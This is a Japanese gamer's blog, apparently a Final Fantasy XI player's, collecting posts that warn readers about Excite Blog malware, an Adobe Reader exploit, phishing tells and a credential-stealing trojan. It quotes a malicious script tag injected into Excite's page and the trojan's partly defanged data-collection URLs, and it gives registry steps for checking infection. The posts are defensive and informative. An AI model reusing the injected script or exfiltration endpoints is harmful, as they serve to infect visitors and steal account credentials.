ここ2~3日、エキサイトブログが表示されなくておかしいなあと思っていたんですが・・・

うらしおさんの記事を見て

→エキサイトで何かが起こってる?;←

あわてて、あろぐさんの記事を見に行きました。
→エキサイトブロガーさんはご注意?!←

私は一週間ほど自分のブログにログインしてなかったので気がつかなかったのですが・・・
avastで警告出ていたとは知りませんでした。
ちなみに今は出てません。

治ったということなのかな?
[PR]
by daigorouchan | 2011-03-22 21:17 | 生活そのた | Trackback | Comments(0)

ある革職人の軌跡さんの昨日のエントリに、速報が掲載されていました。

ヴァナモンさんに何かしかけられているようですとのこと。

Adobe Reader 9.3.0/8.2.Xになって無い人がこれに引っかかるとのこと。
9.3.0はここ1週間くらいの間に出た奴なので変わって無い人も多いと思います。
(私は職場では変更していましたが、自宅のPCは変更してませんでした;;うあー)
発見報告が22年1月19日の深夜ですのでここ1-2日にヴァナモンさんのモブサーチ使った人は警戒しておいてください。
当座の対処法としては、Adobe Readerをバージョンアップし、Adobe Readerの環境設定で”JavaScriptを使用”という項目があるのですが、これをオフにするように各自確認してくださいますようお願いいたします。
[PR]
by daigorouchan | 2010-01-21 10:25 | FFXIそのた | Trackback | Comments(0)

昨日、かなり馬鹿なことで大騒ぎしちゃったので・・・
教訓のために書いておこうと思います。

ことの起こりは、24日17時からモグボナンザが発売になるということに気がついたこと。
ボナンザ発売するなら、課金止めていた倉庫キャラに課金して復活させなきゃ!と思っていたのです。

ところが。

「拡張コンテンツ」の「復活」をクリックしてパスワードを入れても、POLビューワーの「サービス&サポート」の会員情報をクリックして、パスワードを入れても、とにかくエラーが出るばかり。
自分の情報なのに見られないよーと一人でパニック。

FFにはなぜかログインできるので、GMコールして相談してみるも、プレイオンライン会員情報に関してはGMには閲覧権限がないらしい。
でも、今日は祭日。サポートセンターは休み。
FF内でフレに相談したり、フレにもプレイオンラインで試してもらったり、フレの助言でPS2でもログインしてみたりと色々やってみるが、フレAちゃんは普通に会員情報閲覧できたそうで・・・フレTさまは「だめだったー」という。
この違いは何だろう???
不思議に思いつつ、フレCに聞いてみた。
すると。

「最初にプレイオンラインパスワードを入力すると、次の画面に進んで、スクエアエニックスパスワードとワンタイムパスワードを入力する欄が出る」
ということが判明。

シャントット様を買ったときはそんな仕様じゃ無かったのに変わったのか。
少ない脳みそをひねって思い出してみる。
そういえば、セキュリティトークン導入のときに、FFのログインのときは、「プレイオンラインパスワードは次回から入力しない」にチェックを入れる必要があって、入力を省略させられてるんだったような。

自分は単純にプレイオンラインパスワード=スクエニパスワードだと思っていたけど、変更していたのかもしれない!

あわてて自分が普段使っている何種類かのパスワードを試してみた。
すると、すっっっっかり忘れていたんですが、一つのパスワードが正解で、無事に次の画面に進むことができましたー!やったー!

FFXIのログインの時にもパスワード保存か毎回入力か選べるようにしてほしいものです;;私は毎回入力しても平気なので。そうじゃなければ、POLパスワードを****で表示してくれるとか。
完全にPOLパスワードの存在を忘れきっていましたよ・・・

【本日の教訓】
 パスワードは忘れない。 セキュリティトークン導入していると、POLパスワードとスクエアエニクスパスワードは別物。
 親切に話を聞いてくれたGMさま、試してくれたフレAさま、フレTさま、フレCさま、ありがとうございました。
[PR]
by daigorouchan | 2009-12-24 13:20 | FFXIそのた | Trackback | Comments(0)

iTuneでアカハック?

アカハクくろうた

インフルエンザ落ち着いたので安心してFFブログを久々にまわっていたところ・・・いつも楽しく読ませていただいている、妄想竜騎士ハイジャンプさまに上記のような気になる記事がのっておりました。

アカハックってネットゲーだけじゃないんですね、って、当たり前か。
ネットゲーのアカハックより、iTuneのアカハックの方が何倍も深刻そうです。

私はiTuneで登録したことないけど、大昔のソニーのプレーヤーにそういえばそんなソフトついていたかな?ノーパソのHDDのクリーンインストールしたときに消してそのままにしてるけど。

気になってぐぐったら、10万単位の被害や、クレカ上限までiTuneで買い物されてしまった人までいるとか・・・。
どの被害者もアップル社の対応の悪さを非難しまくりです。アップル社も自衛のために必死なんだろうけど、ちゃんとセキュリティ問題の解決はしているんだろうか・・・

どこから流出したのかわかりませんが、クレジットカードの明細はまじめにチェックしないと痛い目を見るということなんだなあorz
自衛大事。超大事。
[PR]
by daigorouchan | 2009-10-30 14:34 | FFXIそのた | Trackback | Comments(2)

実は私は過去にディアブロというネットゲームで遊んでいたことがあります。
ディアブロはMMOじゃなくて、PSOみたいなタイプのゲーム。
チャットルームで人を誘って部屋を作って4人まで遊べるという感じのアクションRPGでした。
ディアブロ2になると最大8人まで遊べました。

このゲームで私は一度アカウントハックにあったことがあります。
手口はいたって単純なものでした。

(1)チャットルームにいる私にFF11で言う「テル」のようなものが来た。
(2)内容は「あなたのランキング(ディアブロには戦闘回数などに応じてランキングが存在した)を教えるのでIDとパスワードを送りなさい」という英文。ディアブロは英語のゲームだったので、英文であることは内容に特に疑問は感じなかった。ディアブロの場合は、システムからのメッセージは色が違っており、そのテルは色が特別な色だったのでてっきりシステムメッセだと思った。
(3)私はIDとパスを送った。
(4)翌日から私は「パスワードが違います」と表示されるようになり、ログインできなくなった。
(5)泣き寝入り(無料のネットゲームだったし)

今から思うとものすごく幼稚な手口だったんですよね・・・

でも、これと似たようなことが現在FF11で行われているようです。

詳しくはヴァナ・ディール出戻り紀行さんのこれが噂の。を参照してください。

GMを騙ったテルがプレイヤーに直接来て、テルの内容にあるURLにアクセスするとPOLのIDやパスワード、スクエアエニクスIDなどの入力を要求され、アカウントハックされるようです。

冷静にURLを見れば、スクエニとは全く関係のないURLであることがわかるのですが。
私が注目したのは名前です。「GM」という名前のGMさんは存在しないはずなのです。
GMさんには固有の名前があります。同じ名前の一般プレイヤーも存在しません。

日本人は英語のテル来てもほとんどだまされないだろうけど、英語圏のプレイヤーさんはうっかりするとだまされちゃうだろうなあ;;
GMを名乗る人からテルが来ても、簡単に信じちゃだめですよー。

<8月21日追記>
 たまさんの記事の写真を見たら、不自然に空白が多いことに気がつきました。これは文章の中に「GM」という言葉をうまく入れたんですね。「GM」という文字列はキャラ名に使えないはずなので変だと思ったら、上手に改行しただけのテルのようです(´ω`)
 公式サイトにも書いてありましたが、GMや運営の人が、プレイオンラインにアクセスするようにテルで促すことは無いので、こういうテルがきたら無視しましょう。
[PR]
by daigorouchan | 2009-08-21 14:01 | FFXIそのた | Trackback | Comments(4)

エキサイトトップのソースを見たら削除されたようです。
掲示板にさらに情報がのっていました。

↓↓掲示板からコピペ↓↓

幾つかある同様のスレッドを読んでみると、皆さん avast! を使っている方みたいで私のセキュリティ・ソフト(ウィルスセキュリティZERO)では無反応でした。 そのくせ関係ないものを誤検知したりしますが・・・

トップページのソースを調べてみたら、『お知らせ』にある
ブログパーツ機能を追加しました
ドガログサービス終了のお知らせ
「友達の最新記事」の更新再開のお知らせ
―という文章の後ろにそれぞれ
< script src="http://s1.cawjb.com/jp.js">< /script > ―というスクリプトが挿入されていました。

クリックしても特に問題は無く普通に『エキサイトブログ向上委員会』のページが開くので、夕飯の後でエキサイトに報告しようかな・・・とのんびり構えていたのですが、今調べたら問題のスクリプトは消えていました。
正月休みでエキサイトもまだお休みかと思っていたのですが、ひょっとしたら連絡を受けて対処してくれたのかもしれません。

一応そのソースは保管しておくことにしますが、こうした緊急を要することが起きた場合はエキサイトブログに直接報告する方がよろしいかと思います。 掲示板をエキサイトのスタッフがいつも読んでいるとは思えませんので・・・
『お問い合わせフォーム』→ http://regist.excite.co.jp/help/support

↓↓ここまで引用おわり↓↓

一応今は安全になったということですが・・・
お正月から今までエキサイトにログインした方は念のためご自分のPCのウイルス検索をしておいたほうがいいと思います。
私もこれからします;;
[PR]
by daigorouchan | 2009-01-04 22:26 | 生活そのた | Trackback | Comments(0)

※7月15日更新

いますぐPCをチェック!
アカハック問題をまとめてみる

☆あろぐ★さんの記事とパンダのマーチ(社長日記)さんの記事にトラバ。

あちこちのブログで情報を集めたところ、これはFFXIだけの問題じゃないようなので・・・

以下、コピペになることをお許しください。(問題があるようでしたら修正します)

★元記事はパンダのマーチ(社長日記)さまです。該当部分のみ転載いたします。★

2008/07/14追記 - 少し進展しました。
ウィルスの正体、というかIDとパスワードを送信しているであろうファイルが特定されました。

wuauserv.dll(Windows Updateで使われるダイナミックリンクライブラリ)が
wzcsvbxm.dll(正規のシステムには存在しないファイル)に書き換えられているそうです。

wzcsvbxm.dllはsvchost.exeを使い、POLのプロセスを乗っ取ってメモリからIDとパスワードを盗み取ります。つまりパスワードを保存してても、してなくても関係ないようです。

確認方法を下記に記します。

「スタート」→「ファイル名を指定して実行」を選び、regedit と入力してOKを押す。
するとレジストリエディタが起動するので、下記の階層を追って調べる。

HKEY_LOCAL_MACHINE¥SYSTEM¥ControlSetxxx(xxxは数字)¥Services¥wuauserv¥Parameters と
HKEY_LOCAL_MACHINE¥SYSTEM¥CurrentControlSet¥Services¥wuauserv¥Parameters
の中のServiceDll→REG_EXPAND_SZ(種類)のデータを確認。

C:¥WINDOWS¥system32¥wuauserv.dllなら今回の件に感染していません。そのままレジストリエディタを閉じてください。
C:¥WINDOWS¥system32¥wzcsvbxm.dllなど上記以外のファイルの場合、すでに感染してしまっている可能性が高いです。

wzcsvbxm.dllの中身

http://204■13■69■12/fg/post.asp(一部『.』を『■』に変えてあります)や
http://googlesydition.com/4fh7c/post.asp(一部全角文字に変えてあります)

という文字列が存在。これ以外にも亜種があるようです。おそらくこれが送信先。
サーバーはアメリカですが、ホストを逆引きしていくともちろんかの国に到着。

対策

カス○ルスキーの最新のパターンファイルでは、このdllの一部がトロイとしてすでに検出されるようです。ですが亜種が多く存在するようですので、まだまだ不完全です。

さらに現状では上記のdllを生成する本体が判明していないため、wzcsvbxm.dllを本来のwuausev.dllに書き換えても、すぐに再度wzcsvbxm.dllに戻される可能性があります。なのでやはりクリーンインストールがおすすめです。

★転載おわり★

今回の被害の特徴として以下の点は確定のようです。

・Windows Updateがフリーズする
・POLを起動するとエラーが出てPOL強制終了(2回目からは正常に起動)
・シャットダウンに時間がかかるようになった
(PCシャットダウンに数分かかる)

※PS2やX箱でプレイされている方も、LSコミュニティを利用なさっているならば要注意です。そちらでもPOLのIDとパスをパソコンに入力しますので。

(7月15日修正)
[PR]
by daigorouchan | 2008-07-14 21:53 | 生活そのた | Trackback | Comments(0)